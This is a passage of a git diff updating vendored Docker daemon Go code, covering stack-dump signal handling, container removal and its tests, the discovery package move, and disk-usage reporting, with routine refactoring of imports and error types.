+++ b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go
@@ -1,19 +1,19 @@
 // +build !windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"os"
 	"os/signal"
-	"syscall"
 
-	"github.com/Sirupsen/logrus"
 	stackdump "github.com/docker/docker/pkg/signal"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/unix"
 )
 
 func (d *Daemon) setupDumpStackTrap(root string) {
 	c := make(chan os.Signal, 1)
-	signal.Notify(c, syscall.SIGUSR1)
+	signal.Notify(c, unix.SIGUSR1)
 	go func() {
 		for range c {
 			path, err := stackdump.DumpStacks(root)
@@ -22,12 +22,6 @@ func (d *Daemon) setupDumpStackTrap(root string) {
 			} else {
 				logrus.Infof("goroutine stacks written to %s", path)
 			}
-			path, err = d.dumpDaemon(root)
-			if err != nil {
-				logrus.WithError(err).Error("failed to write daemon datastructure dump")
-			} else {
-				logrus.Infof("daemon datastructure dump written to %s", path)
-			}
 		}
 	}()
 }
diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go
index f5b9170907..e83d51f597 100644
--- a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go
+++ b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go
@@ -1,6 +1,6 @@
-// +build !linux,!darwin,!freebsd,!windows,!solaris
+// +build !linux,!darwin,!freebsd,!windows
 
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 func (d *Daemon) setupDumpStackTrap(_ string) {
 	return
diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go
index fb20c9d2c5..b438d03812 100644
--- a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go
+++ b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go
@@ -1,52 +1,46 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
 	"os"
-	"syscall"
 	"unsafe"
 
 	winio "github.com/Microsoft/go-winio"
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/signal"
-	"github.com/docker/docker/pkg/system"
+	"github.com/sirupsen/logrus"
+	"golang.org/x/sys/windows"
 )
 
 func (d *Daemon) setupDumpStackTrap(root string) {
 	// Windows does not support signals like *nix systems. So instead of
 	// trapping on SIGUSR1 to dump stacks, we wait on a Win32 event to be
 	// signaled. ACL'd to builtin administrators and local system
-	ev := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid())
+	event := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid())
+	ev, _ := windows.UTF16PtrFromString(event)
 	sd, err := winio.SddlToSecurityDescriptor("D:P(A;;GA;;;BA)(A;;GA;;;SY)")
 	if err != nil {
-		logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", ev, err.Error())
+		logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", event, err.Error())
 		return
 	}
-	var sa syscall.SecurityAttributes
+	var sa windows.SecurityAttributes
 	sa.Length = uint32(unsafe.Sizeof(sa))
 	sa.InheritHandle = 1
 	sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0]))
-	h, err := system.CreateEvent(&sa, false, false, ev)
+	h, err := windows.CreateEvent(&sa, 0, 0, ev)
 	if h == 0 || err != nil {
-		logrus.Errorf("failed to create debug stackdump event %s: %s", ev, err.Error())
+		logrus.Errorf("failed to create debug stackdump event %s: %s", event, err.Error())
 		return
 	}
 	go func() {
-		logrus.Debugf("Stackdump - waiting signal at %s", ev)
+		logrus.Debugf("Stackdump - waiting signal at %s", event)
 		for {
-			syscall.WaitForSingleObject(h, syscall.INFINITE)
+			windows.WaitForSingleObject(h, windows.INFINITE)
 			path, err := signal.DumpStacks(root)
 			if err != nil {
 				logrus.WithError(err).Error("failed to write goroutines dump")
 			} else {
 				logrus.Infof("goroutine stacks written to %s", path)
 			}
-			path, err = d.dumpDaemon(root)
-			if err != nil {
-				logrus.WithError(err).Error("failed to write daemon datastructure dump")
-			} else {
-				logrus.Infof("daemon datastructure dump written to %s", path)
-			}
 		}
 	}()
 }
diff --git a/vendor/github.com/docker/docker/daemon/delete.go b/vendor/github.com/docker/docker/daemon/delete.go
index 6b622bde37..2ccbff05fb 100644
--- a/vendor/github.com/docker/docker/daemon/delete.go
+++ b/vendor/github.com/docker/docker/daemon/delete.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
@@ -7,12 +7,12 @@ import (
 	"strings"
 	"time"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/docker/api/errors"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/container"
-	"github.com/docker/docker/layer"
-	volumestore "github.com/docker/docker/volume/store"
+	"github.com/docker/docker/errdefs"
+	"github.com/docker/docker/pkg/system"
+	"github.com/pkg/errors"
+	"github.com/sirupsen/logrus"
 )
 
 // ContainerRm removes the container id from the filesystem. An error
@@ -29,7 +29,7 @@ func (daemon *Daemon) ContainerRm(name string, config *types.ContainerRmConfig)
 	// Container state RemovalInProgress should be used to avoid races.
 	if inProgress := container.SetRemovalInProgress(); inProgress {
 		err := fmt.Errorf("removal of container %s is already in progress", name)
-		return errors.NewBadRequestError(err)
+		return errdefs.Conflict(err)
 	}
 	defer container.ResetRemovalInProgress()
 
@@ -58,7 +58,7 @@ func (daemon *Daemon) rmLink(container *container.Container, name string) error
 	}
 
 	parent = strings.TrimSuffix(parent, "/")
-	pe, err := daemon.nameIndex.Get(parent)
+	pe, err := daemon.containersReplica.Snapshot().GetID(parent)
 	if err != nil {
 		return fmt.Errorf("Cannot get parent %s for name %s", parent, name)
 	}
@@ -79,90 +79,74 @@ func (daemon *Daemon) rmLink(container *container.Container, name string) error
 func (daemon *Daemon) cleanupContainer(container *container.Container, forceRemove, removeVolume bool) (err error) {
 	if container.IsRunning() {
 		if !forceRemove {
-			err := fmt.Errorf("You cannot remove a running container %s. Stop the container before attempting removal or use -f", container.ID)
-			return errors.NewRequestConflictError(err)
+			state := container.StateString()
+			procedure := "Stop the container before attempting removal or force remove"
+			if state == "paused" {
+				procedure = "Unpause and then " + strings.ToLower(procedure)
+			}
+			err := fmt.Errorf("You cannot remove a %s container %s. %s", state, container.ID, procedure)
+			return errdefs.Conflict(err)
 		}
 		if err := daemon.Kill(container); err != nil {
 			return fmt.Errorf("Could not kill running container %s, cannot remove - %v", container.ID, err)
 		}
 	}
+	if !system.IsOSSupported(container.OS) {
+		return fmt.Errorf("cannot remove %s: %s ", container.ID, system.ErrNotSupportedOperatingSystem)
+	}
 
 	// stop collection of stats for the container regardless
 	// if stats are currently getting collected.
-	daemon.statsCollector.stopCollection(container)
+	daemon.statsCollector.StopCollection(container)
 
 	if err = daemon.containerStop(container, 3); err != nil {
 		return err
 	}
 
 	// Mark container dead. We don't want anybody to be restarting it.
-	container.SetDead()
+	container.Lock()
+	container.Dead = true
 
 	// Save container state to disk. So that if error happens before
 	// container meta file got removed from disk, then a restart of
 	// docker should not make a dead container alive.
-	if err := container.ToDiskLocking(); err != nil && !os.IsNotExist(err) {
+	if err := container.CheckpointTo(daemon.containersReplica); err != nil && !os.IsNotExist(err) {
 		logrus.Errorf("Error saving dying container to disk: %v", err)
 	}
-
-	// If force removal is required, delete container from various
-	// indexes even if removal failed.
-	defer func() {
-		if err == nil || forceRemove {
-			daemon.nameIndex.Delete(container.ID)
-			daemon.linkIndex.delete(container)
-			selinuxFreeLxcContexts(container.ProcessLabel)
-			daemon.idIndex.Delete(container.ID)
-			daemon.containers.Delete(container.ID)
-			if e := daemon.removeMountPoints(container, removeVolume); e != nil {
-				logrus.Error(e)
-			}
-			daemon.LogContainerEvent(container, "destroy")
-		}
-	}()
-
-	if err = os.RemoveAll(container.Root); err != nil {
-		return fmt.Errorf("Unable to remove filesystem for %v: %v", container.ID, err)
-	}
+	container.Unlock()
 
 	// When container creation fails and `RWLayer` has not been created yet, we
 	// do not call `ReleaseRWLayer`
 	if container.RWLayer != nil {
-		metadata, err := daemon.layerStore.ReleaseRWLayer(container.RWLayer)
-		layer.LogReleaseMetadata(metadata)
-		if err != nil && err != layer.ErrMountDoesNotExist {
-			return fmt.Errorf("Driver %s failed to remove root filesystem %s: %s", daemon.GraphDriverName(), container.ID, err)
+		err := daemon.imageService.ReleaseLayer(container.RWLayer, container.OS)
+		if err != nil {
+			err = errors.Wrapf(err, "container %s", container.ID)
+			container.SetRemovalError(err)
+			return err
 		}
+		container.RWLayer = nil
 	}
 
-	return nil
-}
-
-// VolumeRm removes the volume with the given name.
-// If the volume is referenced by a container it is not removed
-// This is called directly from the Engine API
-func (daemon *Daemon) VolumeRm(name string, force bool) error {
-	err := daemon.volumeRm(name)
-	if err == nil || force {
-		daemon.volumes.Purge(name)
-		return nil
+	if err := system.EnsureRemoveAll(container.Root); err != nil {
+		e := errors.Wrapf(err, "unable to remove filesystem for %s", container.ID)
+		container.SetRemovalError(e)
+		return e
 	}
-	return err
-}
 
-func (daemon *Daemon) volumeRm(name string) error {
-	v, err := daemon.volumes.Get(name)
-	if err != nil {
-		return err
+	linkNames := daemon.linkIndex.delete(container)
+	selinuxFreeLxcContexts(container.ProcessLabel)
+	daemon.idIndex.Delete(container.ID)
+	daemon.containers.Delete(container.ID)
+	daemon.containersReplica.Delete(container)
+	if e := daemon.removeMountPoints(container, removeVolume); e != nil {
+		logrus.Error(e)
 	}
-
-	if err := daemon.volumes.Remove(v); err != nil {
-		if volumestore.IsInUse(err) {
-			err := fmt.Errorf("Unable to remove volume, volume still in use: %v", err)
-			return errors.NewRequestConflictError(err)
-		}
-		return fmt.Errorf("Error while removing volume %s: %v", name, err)
+	for _, name := range linkNames {
+		daemon.releaseName(name)
 	}
-	daemon.LogVolumeEvent(v.Name(), "destroy", map[string]string{"driver": v.DriverName()})
+	container.SetRemoved()
+	stateCtr.del(container.ID)
+
+	daemon.LogContainerEvent(container, "destroy")
 	return nil
 }
diff --git a/vendor/github.com/docker/docker/daemon/delete_test.go b/vendor/github.com/docker/docker/daemon/delete_test.go
index 1fd27e1ffa..d600917b0c 100644
--- a/vendor/github.com/docker/docker/daemon/delete_test.go
+++ b/vendor/github.com/docker/docker/daemon/delete_test.go
@@ -1,4 +1,4 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
 	"fmt"
@@ -9,35 +9,87 @@ import (
 	"github.com/docker/docker/api/types"
 	containertypes "github.com/docker/docker/api/types/container"
 	"github.com/docker/docker/container"
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
-func TestContainerDoubleDelete(t *testing.T) {
+func newDaemonWithTmpRoot(t *testing.T) (*Daemon, func()) {
 	tmp, err := ioutil.TempDir("", "docker-daemon-unix-test-")
-	if err != nil {
-		t.Fatal(err)
-	}
-	defer os.RemoveAll(tmp)
-	daemon := &Daemon{
+	assert.NilError(t, err)
+	d := &Daemon{
 		repository: tmp,
 		root:       tmp,
 	}
-	daemon.containers = container.NewMemoryStore()
-
-	container := &container.Container{
-		CommonContainer: container.CommonContainer{
-			ID:     "test",
-			State:  container.NewState(),
-			Config: &containertypes.Config{},
-		},
+	d.containers = container.NewMemoryStore()
+	return d, func() { os.RemoveAll(tmp) }
+}
+
+func newContainerWithState(state *container.State) *container.Container {
+	return &container.Container{
+		ID:     "test",
+		State:  state,
+		Config: &containertypes.Config{},
+	}
+}
+
+// TestContainerDelete tests that a useful error message and instructions is
+// given when attempting to remove a container (#30842)
+func TestContainerDelete(t *testing.T) {
+	tt := []struct {
+		errMsg        string
+		fixMsg        string
+		initContainer func() *container.Container
+	}{
+		// a paused container
+		{
+			errMsg: "cannot remove a paused container",
+			fixMsg: "Unpause and then stop the container before attempting removal or force remove",
+			initContainer: func() *container.Container {
+				return newContainerWithState(&container.State{Paused: true, Running: true})
+			}},
+		// a restarting container
+		{
+			errMsg: "cannot remove a restarting container",
+			fixMsg: "Stop the container before attempting removal or force remove",
+			initContainer: func() *container.Container {
+				c := newContainerWithState(container.NewState())
+				c.SetRunning(0, true)
+				c.SetRestarting(&container.ExitStatus{})
+				return c
+			}},
+		// a running container
+		{
+			errMsg: "cannot remove a running container",
+			fixMsg: "Stop the container before attempting removal or force remove",
+			initContainer: func() *container.Container {
+				return newContainerWithState(&container.State{Running: true})
+			}},
 	}
-	daemon.containers.Add(container.ID, container)
+
+	for _, te := range tt {
+		c := te.initContainer()
+		d, cleanup := newDaemonWithTmpRoot(t)
+		defer cleanup()
+		d.containers.Add(c.ID, c)
+
+		err := d.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: false})
+		assert.Check(t, is.ErrorContains(err, te.errMsg))
+		assert.Check(t, is.ErrorContains(err, te.fixMsg))
+	}
+}
+
+func TestContainerDoubleDelete(t *testing.T) {
+	c := newContainerWithState(container.NewState())
 
 	// Mark the container as having a delete in progress
-	container.SetRemovalInProgress()
+	c.SetRemovalInProgress()
+
+	d, cleanup := newDaemonWithTmpRoot(t)
+	defer cleanup()
+	d.containers.Add(c.ID, c)
 
 	// Try to remove the container when its state is removalInProgress.
 	// It should return an error indicating it is under removal progress.
-	if err := daemon.ContainerRm(container.ID, &types.ContainerRmConfig{ForceRemove: true}); err == nil {
-		t.Fatalf("expected err: %v, got nil", fmt.Sprintf("removal of container %s is already in progress", container.ID))
-	}
+	err := d.ContainerRm(c.ID, &types.ContainerRmConfig{ForceRemove: true})
+	assert.Check(t, is.ErrorContains(err, fmt.Sprintf("removal of container %s is already in progress", c.ID)))
 }
diff --git a/vendor/github.com/docker/docker/daemon/dependency.go b/vendor/github.com/docker/docker/daemon/dependency.go
new file mode 100644
index 0000000000..45275dbf4c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/dependency.go
@@ -0,0 +1,17 @@
+package daemon // import "github.com/docker/docker/daemon"
+
+import (
+	"github.com/docker/swarmkit/agent/exec"
+)
+
+// SetContainerDependencyStore sets the dependency store backend for the container
+func (daemon *Daemon) SetContainerDependencyStore(name string, store exec.DependencyGetter) error {
+	c, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	c.DependencyStore = store
+
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/discovery.go b/vendor/github.com/docker/docker/daemon/discovery/discovery.go
similarity index 83%
rename from vendor/github.com/docker/docker/daemon/discovery.go
rename to vendor/github.com/docker/docker/daemon/discovery/discovery.go
index ee4ea875b7..092c57638a 100644
--- a/vendor/github.com/docker/docker/daemon/discovery.go
+++ b/vendor/github.com/docker/docker/daemon/discovery/discovery.go
@@ -1,14 +1,13 @@
-package daemon
+package discovery // import "github.com/docker/docker/daemon/discovery"
 
 import (
 	"errors"
 	"fmt"
-	"reflect"
 	"strconv"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/docker/pkg/discovery"
+	"github.com/sirupsen/logrus"
 
 	// Register the libkv backends for discovery.
 	_ "github.com/docker/docker/pkg/discovery/kv"
@@ -21,9 +20,11 @@ const (
 	defaultDiscoveryTTLFactor = 3
 )
 
-var errDiscoveryDisabled = errors.New("discovery is disabled")
+// ErrDiscoveryDisabled is an error returned if the discovery is disabled
+var ErrDiscoveryDisabled = errors.New("discovery is disabled")
 
-type discoveryReloader interface {
+// Reloader is the discovery reloader of the daemon
+type Reloader interface {
 	discovery.Watcher
 	Stop()
 	Reload(backend, address string, clusterOpts map[string]string) error
@@ -80,8 +81,7 @@ func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration,
 		ttl = time.Duration(t) * time.Second
 
 		if _, ok := clusterOpts["discovery.heartbeat"]; !ok {
-			h := int(t / defaultDiscoveryTTLFactor)
-			heartbeat = time.Duration(h) * time.Second
+			heartbeat = time.Duration(t) * time.Second / time.Duration(defaultDiscoveryTTLFactor)
 		}
 
 		if ttl <= heartbeat {
@@ -93,9 +93,9 @@ func discoveryOpts(clusterOpts map[string]string) (time.Duration, time.Duration,
 	return heartbeat, ttl, nil
 }
 
-// initDiscovery initializes the nodes discovery subsystem by connecting to the specified backend
+// Init initializes the nodes discovery subsystem by connecting to the specified backend
 // and starts a registration loop to advertise the current node under the specified address.
-func initDiscovery(backendAddress, advertiseAddress string, clusterOpts map[string]string) (discoveryReloader, error) {
+func Init(backendAddress, advertiseAddress string, clusterOpts map[string]string) (Reloader, error) {
 	heartbeat, backend, err := parseDiscoveryOptions(backendAddress, clusterOpts)
 	if err != nil {
 		return nil, err
@@ -121,6 +121,8 @@ func (d *daemonDiscoveryReloader) advertiseHeartbeat(address string) {
 	if err := d.initHeartbeat(address); err == nil {
 		ready = true
 		close(d.readyCh)
+	} else {
+		logrus.WithError(err).Debug("First discovery heartbeat failed")
 	}
 
 	for {
@@ -198,18 +200,3 @@ func parseDiscoveryOptions(backendAddress string, clusterOpts map[string]string)
 	}
 	return heartbeat, backend, nil
 }
-
-// modifiedDiscoverySettings returns whether the discovery configuration has been modified or not.
-func modifiedDiscoverySettings(config *Config, backendType, advertise string, clusterOpts map[string]string) bool {
-	if config.ClusterStore != backendType || config.ClusterAdvertise != advertise {
-		return true
-	}
-
-	if (config.ClusterOpts == nil && clusterOpts == nil) ||
-		(config.ClusterOpts == nil && len(clusterOpts) == 0) ||
-		(len(config.ClusterOpts) == 0 && clusterOpts == nil) {
-		return false
-	}
-
-	return !reflect.DeepEqual(config.ClusterOpts, clusterOpts)
-}
diff --git a/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go
new file mode 100644
index 0000000000..c354a2918d
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/discovery/discovery_test.go
@@ -0,0 +1,96 @@
+package discovery // import "github.com/docker/docker/daemon/discovery"
+
+import (
+	"fmt"
+	"testing"
+	"time"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestDiscoveryOptsErrors(t *testing.T) {
+	var testcases = []struct {
+		doc  string
+		opts map[string]string
+	}{
+		{
+			doc:  "discovery.ttl < discovery.heartbeat",
+			opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"},
+		},
+		{
+			doc:  "discovery.ttl == discovery.heartbeat",
+			opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"},
+		},
+		{
+			doc:  "negative discovery.heartbeat",
+			opts: map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"},
+		},
+		{
+			doc:  "negative discovery.ttl",
+			opts: map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"},
+		},
+		{
+			doc:  "invalid discovery.heartbeat",
+			opts: map[string]string{"discovery.heartbeat": "invalid"},
+		},
+		{
+			doc:  "invalid discovery.ttl",
+			opts: map[string]string{"discovery.ttl": "invalid"},
+		},
+	}
+
+	for _, testcase := range testcases {
+		_, _, err := discoveryOpts(testcase.opts)
+		assert.Check(t, is.ErrorContains(err, ""), testcase.doc)
+	}
+}
+
+func TestDiscoveryOpts(t *testing.T) {
+	clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"}
+	heartbeat, ttl, err := discoveryOpts(clusterOpts)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(10*time.Second, heartbeat))
+	assert.Check(t, is.Equal(20*time.Second, ttl))
+
+	clusterOpts = map[string]string{"discovery.heartbeat": "10"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(10*time.Second, heartbeat))
+	assert.Check(t, is.Equal(10*defaultDiscoveryTTLFactor*time.Second, ttl))
+
+	clusterOpts = map[string]string{"discovery.ttl": "30"}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	assert.NilError(t, err)
+
+	if ttl != 30*time.Second {
+		t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl)
+	}
+
+	expected := 30 * time.Second / defaultDiscoveryTTLFactor
+	if heartbeat != expected {
+		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat)
+	}
+
+	discoveryTTL := fmt.Sprintf("%d", defaultDiscoveryTTLFactor-1)
+	clusterOpts = map[string]string{"discovery.ttl": discoveryTTL}
+	heartbeat, _, err = discoveryOpts(clusterOpts)
+	if err == nil && heartbeat == 0 {
+		t.Fatal("discovery.heartbeat must be positive")
+	}
+
+	clusterOpts = map[string]string{}
+	heartbeat, ttl, err = discoveryOpts(clusterOpts)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if heartbeat != defaultDiscoveryHeartbeat {
+		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat)
+	}
+
+	expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor
+	if ttl != expected {
+		t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl)
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/discovery_test.go b/vendor/github.com/docker/docker/daemon/discovery_test.go
deleted file mode 100644
index 336973c516..0000000000
--- a/vendor/github.com/docker/docker/daemon/discovery_test.go
+++ /dev/null
@@ -1,164 +0,0 @@
-package daemon
-
-import (
-	"testing"
-	"time"
-)
-
-func TestDiscoveryOpts(t *testing.T) {
-	clusterOpts := map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "5"}
-	heartbeat, ttl, err := discoveryOpts(clusterOpts)
-	if err == nil {
-		t.Fatalf("discovery.ttl < discovery.heartbeat must fail")
-	}
-
-	clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "10"}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err == nil {
-		t.Fatalf("discovery.ttl == discovery.heartbeat must fail")
-	}
-
-	clusterOpts = map[string]string{"discovery.heartbeat": "-10", "discovery.ttl": "10"}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err == nil {
-		t.Fatalf("negative discovery.heartbeat must fail")
-	}
-
-	clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "-10"}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err == nil {
-		t.Fatalf("negative discovery.ttl must fail")
-	}
-
-	clusterOpts = map[string]string{"discovery.heartbeat": "invalid"}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err == nil {
-		t.Fatalf("invalid discovery.heartbeat must fail")
-	}
-
-	clusterOpts = map[string]string{"discovery.ttl": "invalid"}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err == nil {
-		t.Fatalf("invalid discovery.ttl must fail")
-	}
-
-	clusterOpts = map[string]string{"discovery.heartbeat": "10", "discovery.ttl": "20"}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if heartbeat != 10*time.Second {
-		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat)
-	}
-
-	if ttl != 20*time.Second {
-		t.Fatalf("TTL - Expected : %v, Actual : %v", 20*time.Second, ttl)
-	}
-
-	clusterOpts = map[string]string{"discovery.heartbeat": "10"}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if heartbeat != 10*time.Second {
-		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", 10*time.Second, heartbeat)
-	}
-
-	expected := 10 * defaultDiscoveryTTLFactor * time.Second
-	if ttl != expected {
-		t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl)
-	}
-
-	clusterOpts = map[string]string{"discovery.ttl": "30"}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if ttl != 30*time.Second {
-		t.Fatalf("TTL - Expected : %v, Actual : %v", 30*time.Second, ttl)
-	}
-
-	expected = 30 * time.Second / defaultDiscoveryTTLFactor
-	if heartbeat != expected {
-		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", expected, heartbeat)
-	}
-
-	clusterOpts = map[string]string{}
-	heartbeat, ttl, err = discoveryOpts(clusterOpts)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if heartbeat != defaultDiscoveryHeartbeat {
-		t.Fatalf("Heartbeat - Expected : %v, Actual : %v", defaultDiscoveryHeartbeat, heartbeat)
-	}
-
-	expected = defaultDiscoveryHeartbeat * defaultDiscoveryTTLFactor
-	if ttl != expected {
-		t.Fatalf("TTL - Expected : %v, Actual : %v", expected, ttl)
-	}
-}
-
-func TestModifiedDiscoverySettings(t *testing.T) {
-	cases := []struct {
-		current  *Config
-		modified *Config
-		expected bool
-	}{
-		{
-			current:  discoveryConfig("foo", "bar", map[string]string{}),
-			modified: discoveryConfig("foo", "bar", map[string]string{}),
-			expected: false,
-		},
-		{
-			current:  discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
-			modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
-			expected: false,
-		},
-		{
-			current:  discoveryConfig("foo", "bar", map[string]string{}),
-			modified: discoveryConfig("foo", "bar", nil),
-			expected: false,
-		},
-		{
-			current:  discoveryConfig("foo", "bar", nil),
-			modified: discoveryConfig("foo", "bar", map[string]string{}),
-			expected: false,
-		},
-		{
-			current:  discoveryConfig("foo", "bar", nil),
-			modified: discoveryConfig("baz", "bar", nil),
-			expected: true,
-		},
-		{
-			current:  discoveryConfig("foo", "bar", nil),
-			modified: discoveryConfig("foo", "baz", nil),
-			expected: true,
-		},
-		{
-			current:  discoveryConfig("foo", "bar", nil),
-			modified: discoveryConfig("foo", "bar", map[string]string{"foo": "bar"}),
-			expected: true,
-		},
-	}
-
-	for _, c := range cases {
-		got := modifiedDiscoverySettings(c.current, c.modified.ClusterStore, c.modified.ClusterAdvertise, c.modified.ClusterOpts)
-		if c.expected != got {
-			t.Fatalf("expected %v, got %v: current config %v, new config %v", c.expected, got, c.current, c.modified)
-		}
-	}
-}
-
-func discoveryConfig(backendAddr, advertiseAddr string, opts map[string]string) *Config {
-	return &Config{
-		CommonConfig: CommonConfig{
-			ClusterStore:     backendAddr,
-			ClusterAdvertise: advertiseAddr,
-			ClusterOpts:      opts,
-		},
-	}
-}
diff --git a/vendor/github.com/docker/docker/daemon/disk_usage.go b/vendor/github.com/docker/docker/daemon/disk_usage.go
index c3b918660d..5bec60d174 100644
--- a/vendor/github.com/docker/docker/daemon/disk_usage.go
+++ b/vendor/github.com/docker/docker/daemon/disk_usage.go
@@ -1,40 +1,21 @@
-package daemon
+package daemon // import "github.com/docker/docker/daemon"
 
 import (
+	"context"
 	"fmt"
+	"sync/atomic"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/api/types"
 	"github.com/docker/docker/api/types/filters"
-	"github.com/docker/docker/layer"
-	"github.com/docker/docker/pkg/directory"
-	"github.com/docker/docker/volume"
 )
 
-func (daemon *Daemon) getLayerRefs() map[layer.ChainID]int {
-	tmpImages := daemon.imageStore.Map()
-	layerRefs := map[layer.ChainID]int{}
-	for id, img := range tmpImages {
-		dgst := digest.Digest(id)
-		if len(daemon.referenceStore.References(dgst)) == 0 && len(daemon.imageStore.Children(id)) != 0 {
-			continue
-		}
-
-		rootFS := *img.RootFS
-		rootFS.DiffIDs = nil
-		for _, id := range img.RootFS.DiffIDs {
-			rootFS.Append(id)
-			chid := rootFS.ChainID()
-			layerRefs[chid]++
-		}
+// SystemDiskUsage returns information about the daemon data disk usage
+func (daemon *Daemon) SystemDiskUsage(ctx context.Context) (*types.DiskUsage, error) {
+	if !atomic.CompareAndSwapInt32(&daemon.diskUsageRunning, 0, 1) {
+		return nil, fmt.Errorf("a disk usage operation is already running")
 	}
+	defer atomic.StoreInt32(&daemon.diskUsageRunning, 0)
 
-	return layerRefs
-}
-
-// SystemDiskUsage returns information about the daemon data disk usage
-func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) {
 	// Retrieve container list
 	allContainers, err := daemon.Containers(&types.ContainerListOptions{
 		Size: true,
@@ -45,56 +26,25 @@ func (daemon *Daemon) SystemDiskUsage() (*types.DiskUsage, error) {
 	}
 
 	// Get all top images with extra attributes
-	allImages, err := daemon.Images(filters.NewArgs(), false, true)
+	allImages, err := daemon.imageService.Images(filters.NewArgs(), false, true)
 	if err != nil {
 		return nil, fmt.Errorf("failed to retrieve image list: %v", err)
 	}
 
-	// Get all local volumes
-	allVolumes := []*types.Volume{}
-	getLocalVols := func(v volume.Volume) error {
-		name := v.Name()
-		refs := daemon.volumes.Refs(v)
-
-		tv := volumeToAPIType(v)
-		sz, err := directory.Size(v.Path())
-		if err != nil {
-			logrus.Warnf("failed to determine size of volume %v", name)
-			sz = -1
-		}
-		tv.UsageData = &types.VolumeUsageData{Size: sz, RefCount: int64(len(refs))}
-		allVolumes = append(allVolumes, tv)
-
-		return nil
-	}
-
-	err = daemon.traverseLocalVolumes(getLocalVols)
+	localVolumes, err := daemon.volumes.LocalVolumesSize(ctx)
 	if err != nil {
 		return nil, err
 	}
 
-	// Get total layers size on disk
-	layerRefs := daemon.getLayerRefs()
-	allLayers := daemon.layerStore.Map()
-	var allLayersSize int64
-	for _, l := range allLayers {
-		size, err := l.DiffSize()
-		if err == nil {
-			if _, ok := layerRefs[l.ChainID()]; ok {
-				allLayersSize += size
-			} else {
-				logrus.Warnf("found leaked image layer %v", l.ChainID())
-			}
-		} else {
-			logrus.Warnf("failed to get diff size for layer %v", l.ChainID())
-		}
-
+	allLayersSize, err := daemon.imageService.LayerDiskUsage(ctx)
+	if err != nil {
+		return nil, err
 	}
 
 	return &types.DiskUsage{
 		LayersSize: allLayersSize,
 		Containers: allContainers,
-		Volumes:    allVolumes,
+		Volumes:    localVolumes,
